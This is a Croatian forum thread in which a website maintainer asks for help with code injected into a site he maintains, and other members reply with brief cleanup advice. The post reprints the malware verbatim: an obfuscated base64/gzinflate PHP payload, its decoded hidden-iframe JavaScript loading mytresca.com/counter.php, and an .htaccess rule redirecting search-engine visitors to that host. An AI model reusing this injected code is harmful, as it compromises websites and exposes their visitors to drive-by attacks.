Malware kod na stranici

adios20000 · srpanj 2012 06:41 19

Pozz, imam problema sa stranicom koju odrzavam svaki puta me preusmjeri na tamo neki counter.php…, adresa je: Helen Doron Špansko

Kod koji se svako malo umetne u stranicu:

#c3284d# 

echo(gzinflate(base64_decode("VVHLboMwELxXyj/4ZlBT85KgDxIprXroqR/QVMixl2AJbMdeSNKvL5Aoao87Ozszu1t64ZTF9eJu4I5UB7Ii0oi+A41MOOAI7y1MVUBV7XgHNFwu7io98qgH3CA6tesR6MuIHr4q/R1Q7wRdEtog2uco6s7owAvOhOkiYXqN4JhtLA3nEebx3AKzxitUZtblO2/am+aVcFQSm6mb5Pb0121OtTNOghtdNR/UnqNxrPfgNvtpD6UlnD7rgGZPIsvSPK5zWeRFAqnkUMg4k0n8WECa0pDck+RfrhZqnFwf8jSOL8a3+xydQghoKdVAlFxtqf3hctjSdRmN0Hpe8EbeA14v+Xr+kMGFS0PGrQUt3xrVyqA6TCNldP3JLw==")));

#/c3284d#

Kada sam upisao ovaj kod u decoder dobio sam ovo:

<script>
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://mytresca.com/counter.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7d03d1087e22') + 1);
_q.style.left = '-6200px';
document.write('<div id=\'pzadv\'></div>');
document.getElementById('pzadv').appendChild(_q);
</script>

I u .htaccess imam:

#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://mytresca.com/counter.php [R=301,L]
</IfModule>
#/c3284d#

Pa, jel moe mala pomoć pliz oko ovoga?

Hvala unaprijed

intuitive · srpanj 2012 06:55 19

najjednostavnije je da iskoristis back up

nightmaster · srpanj 2012 07:31 19

Pa ukloni taj kod i poradi na sigurnosti skripte koju koristiš/stranica/servera…

gambo · srpanj 2012 07:57 19

Ukloniti neželjeni kod
Utvrditi kako je došao
Spriječiti mu povratak

Ima na forumu više tema o tome…

zmecava · srpanj 2012 11:12 19

Otvaranjem ove teme, avast mi je blokirao trojanskog konja. Valjda zbog ovih kodova umetnutih…

Infection: JS:Iframe-QH [Trj]

Probaj googlati možda ima rješenje za njega.

adios20000 · srpanj 2012 15:04 20

Dobro, hvala!